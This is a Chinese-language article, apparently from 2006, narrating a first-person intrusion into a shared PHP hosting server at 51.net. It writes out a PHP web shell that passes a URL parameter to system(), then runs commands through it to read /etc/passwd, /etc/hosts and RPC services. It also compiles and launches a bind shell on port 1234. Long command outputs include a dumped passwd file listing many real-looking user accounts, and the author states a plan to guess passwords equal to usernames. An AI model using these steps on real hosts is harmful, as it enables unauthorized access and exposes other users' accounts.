建Linux下的安全 PHP配置漏洞攻击
来源: 作者: 日期:2006-08-29
【聚杰网Linux】建Linux下的安全 PHP配置漏洞攻击
这些站点的问题主要出在允许使用system(),exec()等等这些函数,熟悉php的朋友应该知道,这些函数是调用系统指令的(虽然通过web server php程序只能有nobody权限),而且一般用户只要申请一个空间就可以获取局部的可写权限,令用户可以写一个web shell程序执行命令.在这些服务器上一般用户不能够登陆,也就是nologin(没有登陆shell,管理员可没那么"慷慨"!),这样利用system(),exec()这些函数就可以bind一个shell出来~!本文以虎翼网(www.51.net)的空间为例子(他是不是所有的服务器都有这个毛病我不知道~我只试验了我的空间所在的服务器):
1.写一个webshell先(php很容易做到)
?>php#shell.php3echo"<pre>";system("$cmd");echo"";?> |
2.上传到空间
3.执行(具体的服务器马赛克处理)
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=id (看一下权限到底多大)uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)root真的很吝啬啊!lynx http://xxx.51.net/cgi-bin/shell.php?cmd=uname -ras(看看系统)FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 2000:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat/etc/passwd(shadow是铁定看不到)root:*:0:0:Charlie &:/root:/bin/cshtoor:*:0:0:Bourne-again Superuser:/root:daemon:*:1:1:Owner of many system processes:/root:/sbin/nologinoperator:*:2:5:System &:/:/sbin/nologinbin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologintty:*:107353:51:USER:/home/tty:/local/bin/nullkmem:*:5:65533:KMem Sandbox:/:/sbin/nologingames:*:7:13:Games pseudo-user:/usr/games:/sbin/nologinnews:*:8:8:News Subsystem:/:/sbin/nologinman:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologinbind:*:53:53:Bind Sandbox:/:/sbin/nologinuucp:*:66:66:UUCPpseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucicoxten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologinpop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologinftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologinnobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologinquotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologinquotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologinquotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologintian:*:1002:1002::/local/tian:/local/bin/kshsysadmin:*:1001:1001:SysteAdministrator:/local/sysadmin:/local/bin/kshtest2:*:9999:51::/home/test2:/local/bin/nullxhjj:*:106200:51:USER:/home/xhjj:/sbin/nologinzhinan:*:106201:51:USER:/home/zhinan:/local/bin/nullyes2:*:106202:51:USER:/home/yes2:/local/bin/nulldaboy:*:106203:51:USER:/home/daboy:/local/bin/nullyesky:*:106204:51:USER:/home/yesky:/local/bin/nullyesk:*:106205:51:USER:/home/yesk:/local/bin/nulllnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/nullfog:*:106207:51:USER:/home/fog:/local/bin/nullrenshou:*:106208:51:USER:/home/renshou:/local/bin/nullhilen:*:106209:51:USER:/home/hilen:/local/bin/nullhapybird:*:106210:51:USER:/home/hapybird:/sbin/nologinxiewei:*:106211:51:USER:/home/xiewei:/sbin/nologinwwwer:*:106212:51:USER:/home/wwwer:/local/bin/nulllarry:*:106213:51:USER:/home/larry:/local/bin/nullsunboys:*:106214:51:USER:/home/sunboys:/local/bin/nulleverydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/nulllinguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/nullbaobao:*:106217:51:USER:/home/baobao:/local/bin/nullchaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/nullhrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/nulldengxian:*:106220:51:USER:/home/dengxian:/local/bin/nullsimonstone:*:106221:51:USER:/home/simonstone:/local/bin/nullchenjian:*:106222:51:USER:/home/chenjian:/local/bin/nulllvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/nullzzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/nullpc2000:*:106225:51:USER:/home/pc2000:/local/bin/nullstartexcel:*:106226:51:USER:/home/startexcel:/local/bin/nullmodel:*:106227:51:USER:/home/model:/local/bin/nullleogirl:*:106228:51:USER:/home/leogirl:/local/bin/nullfohcn:*:106229:51:USER:/home/fohcn:/local/bin/nullljok:*:106230:51:USER:/home/ljok:/local/bin/nullbaorui:*:106231:51:USER:/home/baorui:/local/bin/nullfky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/nullzhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/nullxiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/nullzyinter:*:106235:51:USER:/home/zyinter:/local/bin/nullpower:*:106236:51:USER:/home/power:/local/bin/nullfeefan:*:106237:51:USER:/home/feefan:/local/bin/nullparadise:*:106238:51:USER:/home/paradise:/local/bin/nullwulc:*:106239:51:USER:/home/wulc:/local/bin/nulljcm:*:106240:51:USER:/home/jcm:/local/bin/nullliangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/nulljingder:*:106242:51:USER:/home/jingder:/local/bin/nullhanjun:*:106243:51:USER:/home/hanjun:/local/bin/nulladai:*:106244:51:USER:/home/adai:/local/bin/nullfightben:*:106245:51:USER:/home/fightben:/local/bin/nulllihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/nullxeno:*:106247:51:USER:/home/xeno:/local/bin/null..................(太多了~省略) |
只有几个用户有shell可以登陆,cp到我的目录下面,等一下分离出usrename看看有没有人username=passwd的~呵呵~
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=setHOME=/PS$OPTIND=1PS2=>PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbinIFS=好差的"环境",被设置成这样....lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/hosts# $reeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $# Host Database# This file should contain the addresses and aliases# for local hosts that share this file.# In the presence of the domain name service or NIS, this file may# not be consulted at all; see /etc/host.conf for the resolutionorder.#127.0.0.1 localhost localhost.my.domain myname.my.domain## Imaginary network.#10.0.0.2 myname.my.domain myname#10.0.0.3 myfriend.my.domain myfriend## According to RFC 1918, you can use the following IP networks for# private nets which will never be connected to the Internet:## 10.0.0.0 - 10.255.255.255# 172.16.0.0 - 172.31.255.255# 192.168.0.0 - 192.168.255.255## |
不算太小啊~hosts ~
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=whereis -b gcc
(老天保佑~有gcc)
gcc:/usr/sbin/gcc(万岁!!!!!!!!!!!!)
我来试试看~弄一个大家伙上去,编译一下,哈哈~速度好快!
webshell太累了,bind一个shell出来方便一点...(上传binshell程序,自己写也可以用perl/C,都不太难)
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=gcc -o bind bindshell.clynx http://xxx.51.net/cgi-bin/shell.php?cmd=./bind 1234bind shell too port 1234telnet xxx.51.net 1234 |
.....下面省略,反正就可以执行命令了
嗯~好像这台没装MySQL,可惜~呵呵~~~~~~~~~,对了oso.com.cn的好像有~,不过最近停了.....
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=/usr/sbin/rpcinfo -plocalhostportmapper 100000 portmap sunrpcrstatd 100001 rstat rstat_svc rup perfmeterrusersd 100002 rusersnfs 100003 nfsprogypserv 100004 ypprogmountd 100005 mount showmountypbind 100007walld 100008 rwall shutdownyppasswdd 100009 yppasswdetherstatd 100010 etherstatrquotad 100011 rquotaprog quota rquotasprayd 100012 spray3270_mapper 100013rje_ma |
Linux联盟收集整理
